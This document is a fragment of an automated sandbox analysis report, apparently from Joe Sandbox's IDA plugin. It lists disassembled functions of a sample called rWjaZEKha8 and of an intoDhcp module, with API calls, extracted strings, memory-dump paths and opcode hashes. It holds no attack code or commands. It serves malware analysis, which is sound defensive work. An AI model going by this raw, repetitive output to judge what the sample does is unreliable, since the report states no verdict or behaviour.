                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0019251A
                    • Part of subcall function 00192B52: ___AdjustPointer.LIBCMT ref: 00192B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00192531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00192543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00192567
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  APIs
                  • GetDC.USER32(00000000), ref: 00189DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00189DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00189DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00189DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00192016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0019201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00192020
                    • Part of subcall function 0019310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0019311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00192035
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  APIs
                    • Part of subcall function 00189DF1: GetDC.USER32(00000000), ref: 00189DF5
                    • Part of subcall function 00189DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00189E00
                    • Part of subcall function 00189DF1: ReleaseDC.USER32(00000000,00000000), ref: 00189E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00189F8D
                    • Part of subcall function 0018A1E5: GetDC.USER32(00000000), ref: 0018A1EE
                    • Part of subcall function 0018A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0018A21D
                    • Part of subcall function 0018A1E5: ReleaseDC.USER32(00000000,?), ref: 0018A2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001778CC
                    • Part of subcall function 0017A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A458
                    • Part of subcall function 0017A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  APIs
                    • Part of subcall function 0017EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0017EB92
                    • Part of subcall function 0017EB73: GetProcAddress.KERNEL32(001B81C0,CryptUnprotectMemory), ref: 0017EBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,0017EBEC), ref: 0017EC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 0017EC3B
                  • CryptUnprotectMemory failed, xrefs: 0017EC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,001809D0,?,00000000,00000000), ref: 001808AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 001808F4
                    • Part of subcall function 00176E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00176EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  APIs
                    • Part of subcall function 0017DA98: _swprintf.LIBCMT ref: 0017DABE
                    • Part of subcall function 0017DA98: _strlen.LIBCMT ref: 0017DADF
                    • Part of subcall function 0017DA98: SetDlgItemTextW.USER32(?,001AE154,?), ref: 0017DB3F
                    • Part of subcall function 0017DA98: GetWindowRect.USER32(?,?), ref: 0017DB79
                    • Part of subcall function 0017DA98: GetClientRect.USER32(?,?), ref: 0017DB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                  • SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00180A78,?), ref: 00180854
                  • GetLastError.KERNEL32(?), ref: 00180860
                    • Part of subcall function 00176E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00176EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00180869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,0017D32F,?), ref: 0017DA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0017D32F,?), ref: 0017DA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: %;b
                  • API String ID: 0-1539226091
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc5191aec886689aaf4448886d55a15ab9be05cbd5a09c226c8a725e627521f4
                  • Instruction ID: 0044866cff9ee8c5a9d45210e1493886f80bb38f28395b6deb9c2454c1deae51
                  • Opcode Fuzzy Hash: cc5191aec886689aaf4448886d55a15ab9be05cbd5a09c226c8a725e627521f4
                  • Instruction Fuzzy Hash: 57118670A0A64E8FEB65EBA884B82F97BE0EF6A304F45057EE499C60E1DE7595448700
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95ce0a7bf90e72dfbde7157b1f8f4eceb4acc68d72036acdb66400a022259481
                  • Instruction ID: 66da27562f5e43285dc63f703fdcbce33936d167d9b2c66a15ab313e56f3241e
                  • Opcode Fuzzy Hash: 95ce0a7bf90e72dfbde7157b1f8f4eceb4acc68d72036acdb66400a022259481
                  • Instruction Fuzzy Hash: 23119170A09A0E9EEBA8EF68C4696BE77E1FF18304F10157ED41EC21A5CE75A644C780
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 942e953fa45fbbed7e60de20078244d3c4ca20dbdbe64ee4671468c17d34bfa6
                  • Instruction ID: 71aaa06cedf7715e38cdb86196e7932ec65b9acccc0acc262b4295853c5e056a
                  • Opcode Fuzzy Hash: 942e953fa45fbbed7e60de20078244d3c4ca20dbdbe64ee4671468c17d34bfa6
                  • Instruction Fuzzy Hash: B6119130A0E64E4FDB56EB68C8685B97BB0FF1A300F0504BBD459C70A2EE795A84C740
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6eb3c64e01307bcd5a70790c4aec4694a8cf2ba0647f685540ba8a899bd7020
                  • Instruction ID: 38bd5d7ccff1d43461131edac24c274ea11a41bf457fdf1e7a4e6f1da6b9473e
                  • Opcode Fuzzy Hash: e6eb3c64e01307bcd5a70790c4aec4694a8cf2ba0647f685540ba8a899bd7020
                  • Instruction Fuzzy Hash: BC01B930E4E74D5FD761EBB4C4595A97BF0FF06340F0645BAD498C30B2DA74A1588701
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 274a1ec006e13b1ccf0d63c318f00b10595bb13dacf6d83452c5e59d728d0272
                  • Instruction ID: babd93b6158e4ecd44b062ea7811017d0ac5996d97f8a3536337e006893c8474
                  • Opcode Fuzzy Hash: 274a1ec006e13b1ccf0d63c318f00b10595bb13dacf6d83452c5e59d728d0272
                  • Instruction Fuzzy Hash: 5611A130A0A64E8FEB94EF68C4682BDBBE0FF19300F8104BED45AC31A1DB75A650C700
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 137ffa5fb3e015701f740f3d14086dd92bd72d54ad6203c706302396bdeecd36
                  • Instruction ID: 02dc40b31a0b8ea509f15e4abec3134afbd2f888ce7b4718bae70c5d5b76063f
                  • Opcode Fuzzy Hash: 137ffa5fb3e015701f740f3d14086dd92bd72d54ad6203c706302396bdeecd36
                  • Instruction Fuzzy Hash: F9115B30A0964E8FDB64EF68C4696BD7BB0FF19304F5104BED86AC61A2DB75A654CB00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction ID: eceb38f3c78a6f6ca8ebaa4d322322ac93c3e8b93270a6531754d0026d31910f
                  • Opcode Fuzzy Hash: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction Fuzzy Hash: 29019E30A0950E8FDB98EF68C4656FA77A1FF6A304F11447EE41EC31A4CE75A650CB40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6f16cfb11e5544af8d2e6291a0c66df6a4507c03e3b629c2618964fd3b09832
                  • Instruction ID: e089f002e832b4b8c1fde4b67a6dbfa3f00acbdc1058c82e99ba9e1b0c8b5989
                  • Opcode Fuzzy Hash: b6f16cfb11e5544af8d2e6291a0c66df6a4507c03e3b629c2618964fd3b09832
                  • Instruction Fuzzy Hash: 67015E30A1550E8EEB54FBA8C4686BE76E0FF19304F11057EE45ED25A1EE75A250C740
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ca6d5098c7c1c4e821a120653c4d016b2759126d5451633105e1eb344e73c68
                  • Instruction ID: c712e5293f5dd6774b7ec103b10afe9ccd3a38914dc2aee9c1d0a16df519b69f
                  • Opcode Fuzzy Hash: 3ca6d5098c7c1c4e821a120653c4d016b2759126d5451633105e1eb344e73c68
                  • Instruction Fuzzy Hash: 71017C30A5590E8FEB98EF68C8696BE77E0FF18304F10087AE41EC21A4EF74A250C700
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction ID: d9d91717550e1a68ec71c828ab80d32755691ac30a05bbf854faf5af5efd2a3e
                  • Opcode Fuzzy Hash: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction Fuzzy Hash: BD01A430A0A68E8FDB99DF64C4656FA3BA0FF67304F5100BAE849C71A2DB79D550CB40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction ID: 3989762ac11004b0eaa80af4d562c41a92e76558984772af5090ed4a5152767f
                  • Opcode Fuzzy Hash: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction Fuzzy Hash: 85018F30E0A74E4FE762EBA484686BA7BE0EF1A300F4645B6D448C70B6EE74E244C741
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6b35695616bbf6a424a5616f2c4948fccd00c1295876083e1c15cf5223c97d5
                  • Instruction ID: ffba3c373b959de7c92feb1e18efe9e44023493c2ae2f8ae5feebe8dea0fc770
                  • Opcode Fuzzy Hash: b6b35695616bbf6a424a5616f2c4948fccd00c1295876083e1c15cf5223c97d5
                  • Instruction Fuzzy Hash: 6F01A730A4E34E4FD762EBB4C4695A97BE0EF16300F0705F6D448C70B6DA74E6448701
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction ID: 0fa0816c6ec59418387225229326990d770d17c02122b9ed9fbd8a1e70a2732c
                  • Opcode Fuzzy Hash: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction Fuzzy Hash: 1001D870A0E74D4FE752A7B488695A97FE0EF16340F0604F6D489C70B6DA74A5548301
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc5545c9196207462939d0ddd22f8fe183b18ca05134625d5e77c1b1547f3465
                  • Instruction ID: e3ff6a9c90bf1a155eddd610e4cd9c898cff6218b43fa57f368472e7d0ef44a9
                  • Opcode Fuzzy Hash: cc5545c9196207462939d0ddd22f8fe183b18ca05134625d5e77c1b1547f3465
                  • Instruction Fuzzy Hash: 6D016D30A5990E8EEB90FBB8C9585BA76E0FF19304F0149B6E419C3065EE74AA848A00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction ID: 1a49523b88ca883c63227a04d6f2751f06d5b42cea8c07dcd51b9c50f1b64c3c
                  • Opcode Fuzzy Hash: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction Fuzzy Hash: 7A01AD34A1970E8BEB68EFA4C0286BD33A0FF19304F1008BEE41EC21E4DE75A248C600
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
